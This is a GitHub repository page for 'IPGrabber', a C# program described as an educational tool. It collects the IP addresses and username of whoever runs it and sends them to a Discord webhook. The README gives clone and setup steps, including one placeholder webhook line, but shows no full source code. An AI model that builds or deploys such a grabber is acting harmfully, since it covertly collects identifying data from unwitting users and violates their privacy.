Skip to content

A simple C# script to capture and log IP addresses for educational purposes.

License

Notifications You must be signed in to change notification settings

LouSkull/IPGrabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

tutorial on google drive: https://drive.google.com/file/d/1e_AKwiY05AUIDucs6nTdD5jxGCQy6INk/view?usp=sharing

IPGrabber

Overview

IPGrabber is a simple web-based script designed to capture and log IP addresses for educational purposes. This repository contains the source code for a C# application that logs IP addresses and sends them to a specified Discord webhook. Features

Captures both IPv4 and IPv6 addresses
Logs the username of the person running the application
Sends captured information to a Discord webhook
Easy to set up and use

Installation

Clone the repository:

bash

git clone https://github.com/LouSkull/IPGrabber.git

Open the project in your preferred C# IDE (e.g., Visual Studio). Replace the placeholder in the code with your Discord webhook URL:

csharp

string webhookUrl = "DISCORD_BOT_WEBHOOK_HERE";

Build and run the application.

Usage

Run the application.
The application will capture the IPv4 and IPv6 addresses and the username of the person running it.
The captured information will be sent to the specified Discord webhook.

Disclaimer

This tool is intended for educational purposes only. Use it responsibly and ensure you have proper authorization to log IP addresses. Unauthorized use may violate privacy laws and terms of service. Contribution

Feel free to contribute to the project by submitting pull requests. For major changes, please open an issue first to discuss what you would like to change.

License

This project is licensed under the MIT License.

About

A simple C# script to capture and log IP addresses for educational purposes.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages